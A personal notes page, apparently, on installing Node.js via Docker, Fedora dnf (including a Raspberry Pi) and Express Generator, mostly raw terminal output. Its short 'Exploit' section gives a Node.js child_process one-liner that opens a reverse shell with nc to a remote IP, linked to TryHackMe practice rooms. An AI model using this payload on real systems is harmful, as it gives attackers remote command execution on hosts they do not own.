Get Node.js, originally developed by Ryan Dahl, up and running on Windows, Linux.
Node.js on Windows
Download Node.js and run install.
Node.js on Docker
[tuyen@g73jh nodejs]$ docker build -t tuyendq/node-web-app . Sending build context to Docker daemon 5.632 kB Step 1/7 : FROM node:10-slim Trying to pull repository docker.io/library/node ... sha256:7e32e20848a52d1c77d0ab0e7a38e6c2bc92e2ef88a73bb16b3d64567a33c5e6: Pulling from docker.io/library/node 80369df48736: Already exists d0a772523932: Pull complete d1e688f663a2: Pull complete d5280d845715: Pull complete 4e6f6ecd5080: Pull complete Digest: sha256:7e32e20848a52d1c77d0ab0e7a38e6c2bc92e2ef88a73bb16b3d64567a33c5e6 Status: Downloaded newer image for docker.io/node:10-slim ---> 7a5e19754b85 Step 2/7 : WORKDIR /usr/src/app ---> 66adc5dfe7c2 Removing intermediate container e34a089d7b47 Step 3/7 : COPY ./src/package*.json ./ ---> 0d1aaf848e51 Removing intermediate container 998e2cd4cf4d Step 4/7 : RUN npm install ---> Running in 2ff6df3f7b62 npm notice created a lockfile as package-lock.json. You should commit this file. npm WARN docker_web_app@1.0.0 No repository field. npm WARN docker_web_app@1.0.0 No license field. added 50 packages from 37 contributors and audited 126 packages in 2.859s found 0 vulnerabilities ---> 03055eb76af5 Removing intermediate container 2ff6df3f7b62 Step 5/7 : COPY ./src . ---> f25668527ca4 Removing intermediate container 290659e739e9 Step 6/7 : EXPOSE 8080 ---> Running in e08e7d0dca44 ---> 2de81d72f5c8 Removing intermediate container e08e7d0dca44 Step 7/7 : CMD node server.js ---> Running in 51c6fdf97621 ---> bf7c833fce48 Removing intermediate container 51c6fdf97621 Successfully built bf7c833fce48 [tuyen@g73jh nodejs]$
[tuyen@g73jh nodejs]$ docker run --name node-web-app -p 49160:8080 -d tuyendq/node-web-app 24c21de620a1a642de3889f20aeb7b267d1bf65264e27e28f9f6eb980bb32370 [tuyen@g73jh nodejs]$
Install Node.js on Fedora Workstation 30
[tuyen@g73jh nodejs]$ sudo dnf install -y nodejs [sudo] password for tuyen: Last metadata expiration check: 0:33:40 ago on Wed 20 Nov 2019 08:26:03 PM +07. Dependencies resolved. ================================================================================================================ Package Architecture Version Repository Size ================================================================================================================ Installing: nodejs x86_64 1:10.16.3-1.fc30 updates 100 k Installing dependencies: http-parser x86_64 2.9.2-1.fc30 updates 36 k nodejs-libs x86_64 1:10.16.3-1.fc30 updates 8.9 M Installing weak dependencies: npm x86_64 1:6.9.0-1.10.16.3.1.fc30 updates 3.8 M Transaction Summary ================================================================================================================ Install 4 Packages Total download size: 13 M Installed size: 64 M Downloading Packages: (1/4): http-parser-2.9.2-1.fc30.x86_64.rpm 16 kB/s | 36 kB 00:02 (2/4): nodejs-10.16.3-1.fc30.x86_64.rpm 39 kB/s | 100 kB 00:02 (3/4): nodejs-libs-10.16.3-1.fc30.x86_64.rpm 1.6 MB/s | 8.9 MB 00:05 (4/4): npm-6.9.0-1.10.16.3.1.fc30.x86_64.rpm 976 kB/s | 3.8 MB 00:03 ---------------------------------------------------------------------------------------------------------------- Total 1.8 MB/s | 13 MB 00:06 Running transaction check Transaction check succeeded. Running transaction test Transaction test succeeded. Running transaction Running scriptlet: npm-1:6.9.0-1.10.16.3.1.fc30.x86_64 1/1 Preparing : 1/1 Installing : http-parser-2.9.2-1.fc30.x86_64 1/4 Installing : nodejs-libs-1:10.16.3-1.fc30.x86_64 2/4 Installing : npm-1:6.9.0-1.10.16.3.1.fc30.x86_64 3/4 Installing : nodejs-1:10.16.3-1.fc30.x86_64 4/4 Running scriptlet: nodejs-1:10.16.3-1.fc30.x86_64 4/4 Verifying : http-parser-2.9.2-1.fc30.x86_64 1/4 Verifying : nodejs-1:10.16.3-1.fc30.x86_64 2/4 Verifying : nodejs-libs-1:10.16.3-1.fc30.x86_64 3/4 Verifying : npm-1:6.9.0-1.10.16.3.1.fc30.x86_64 4/4 Installed: nodejs-1:10.16.3-1.fc30.x86_64 npm-1:6.9.0-1.10.16.3.1.fc30.x86_64 http-parser-2.9.2-1.fc30.x86_64 nodejs-libs-1:10.16.3-1.fc30.x86_64 Complete! [tuyen@g73jh nodejs]$
Check version of node.js and npm
[tuyen@g73jh nodejs]$ node --version v10.16.3 [tuyen@g73jh nodejs]$ npm --version 6.9.0 [tuyen@g73jh nodejs]$
Node.js on Fedora minimal server 31 - Raspberry Pi 2
[tuyendq@p22 ~]$ sudo dnf install -y nodejs [sudo] password for tuyendq: Fedora Modular 31 - armhfp 1.2 kB/s | 7.2 kB 00:05 Fedora Modular 31 - armhfp - Updates 821 B/s | 5.7 kB 00:07 Fedora 31 - armhfp - Updates 2.9 kB/s | 5.8 kB 00:01 Fedora 31 - armhfp 8.4 kB/s | 7.3 kB 00:00 Dependencies resolved. ================================================================================================================ Package Architecture Version Repository Size ================================================================================================================ Installing: nodejs armv7hl 1:12.13.0-7.fc31 updates 410 k Installing dependencies: libuv armv7hl 1:1.33.0-2.fc31 updates 134 k nodejs-libs armv7hl 1:12.13.0-7.fc31 updates 18 M npm armv7hl 1:6.12.0-1.12.13.0.7.fc31 updates 3.4 M http-parser armv7hl 2.9.2-2.fc31 fedora 36 k Installing weak dependencies: nodejs-docs noarch 1:12.13.0-7.fc31 updates 2.4 M Transaction Summary ================================================================================================================ Install 6 Packages Total download size: 24 M Installed size: 112 M Downloading Packages: (1/6): libuv-1.33.0-2.fc31.armv7hl.rpm 36 kB/s | 134 kB 00:03 (2/6): nodejs-12.13.0-7.fc31.armv7hl.rpm 52 kB/s | 410 kB 00:07 (3/6): npm-6.12.0-1.12.13.0.7.fc31.armv7hl.rpm 178 kB/s | 3.4 MB 00:19 (4/6): http-parser-2.9.2-2.fc31.armv7hl.rpm 17 kB/s | 36 kB 00:02 (5/6): nodejs-docs-12.13.0-7.fc31.noarch.rpm 74 kB/s | 2.4 MB 00:33 (6/6): nodejs-libs-12.13.0-7.fc31.armv7hl.rpm 286 kB/s | 18 MB 01:03 ---------------------------------------------------------------------------------------------------------------- Total 356 kB/s | 24 MB 01:09 Running transaction check Transaction check succeeded. Running transaction test Transaction test succeeded. Running transaction Running scriptlet: npm-1:6.12.0-1.12.13.0.7.fc31.armv7hl 1/1 Preparing : 1/1 Installing : libuv-1:1.33.0-2.fc31.armv7hl 1/6 Installing : nodejs-docs-1:12.13.0-7.fc31.noarch 2/6 Installing : nodejs-libs-1:12.13.0-7.fc31.armv7hl 3/6 Installing : http-parser-2.9.2-2.fc31.armv7hl 4/6 Installing : npm-1:6.12.0-1.12.13.0.7.fc31.armv7hl 5/6 Installing : nodejs-1:12.13.0-7.fc31.armv7hl 6/6 Running scriptlet: nodejs-1:12.13.0-7.fc31.armv7hl 6/6 Verifying : libuv-1:1.33.0-2.fc31.armv7hl 1/6 Verifying : nodejs-1:12.13.0-7.fc31.armv7hl 2/6 Verifying : nodejs-docs-1:12.13.0-7.fc31.noarch 3/6 Verifying : nodejs-libs-1:12.13.0-7.fc31.armv7hl 4/6 Verifying : npm-1:6.12.0-1.12.13.0.7.fc31.armv7hl 5/6 Verifying : http-parser-2.9.2-2.fc31.armv7hl 6/6 Installed: nodejs-1:12.13.0-7.fc31.armv7hl nodejs-docs-1:12.13.0-7.fc31.noarch libuv-1:1.33.0-2.fc31.armv7hl nodejs-libs-1:12.13.0-7.fc31.armv7hl npm-1:6.12.0-1.12.13.0.7.fc31.armv7hl http-parser-2.9.2-2.fc31.armv7hl Complete! [tuyendq@p22 ~]$ node --version v12.13.0 [tuyendq@p22 ~]$ npm --version 6.12.0 [tuyendq@p22 ~]$
Node.js Cheat Sheet
npm help npm list -g npm config get prefix npm help npm install <package> --global npm uninstall <package> --global
Express Generator
Install Express Generator
D:\Projects>npm install -g express-generator D:\nodejs\node_modules\npm\express -> D:\nodejs\node_modules\npm\node_modules\express-generator\bin\express-cli.js + express-generator@4.16.1 updated 1 package in 4.831s F:\Projects>
PS D:\projects\lthwnodejs> npm list -g | grep express-generator PS D:\projects\lthwnodejs> npm i express-generator -E -g D:\nodejs\express -> D:\nodejs\node_modules\express-generator\bin\express-cli.js
+ express-generator@4.16.1
added 10 packages from 13 contributors in 50.067s
PS D:\projects\lthwnodejs> npm list -g | grep express-generator +-- express-generator@4.16.1
PS D:\projects\lthwnodejs> which express
/d/nodejs/express
PS D:\projects\lthwnodejs> express --view=pub mongodbtest
create : mongodbtest\
create : mongodbtest\public\
create : mongodbtest\public\javascripts\
create : mongodbtest\public\images\
create : mongodbtest\public\stylesheets\
create : mongodbtest\public\stylesheets\style.css
create : mongodbtest\routes\
create : mongodbtest\routes\index.js
create : mongodbtest\routes\users.js
create : mongodbtest\views\
create : mongodbtest\app.js
create : mongodbtest\package.json
create : mongodbtest\bin\
create : mongodbtest\bin\www
change directory:
> cd mongodbtest
install dependencies:
> npm install
run the app:
> SET DEBUG=mongodbtest:* & npm start
PS D:\projects\lthwnodejs>
Exploit
Exploit eval() to create reverve shell
require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.146.172 1234 >/tmp/f')
Related articles
>>> Deno: A secure runtime for JavaScript and TypeScript
Practice
>>> THM | Ultrateck
>>> THM | GLITCH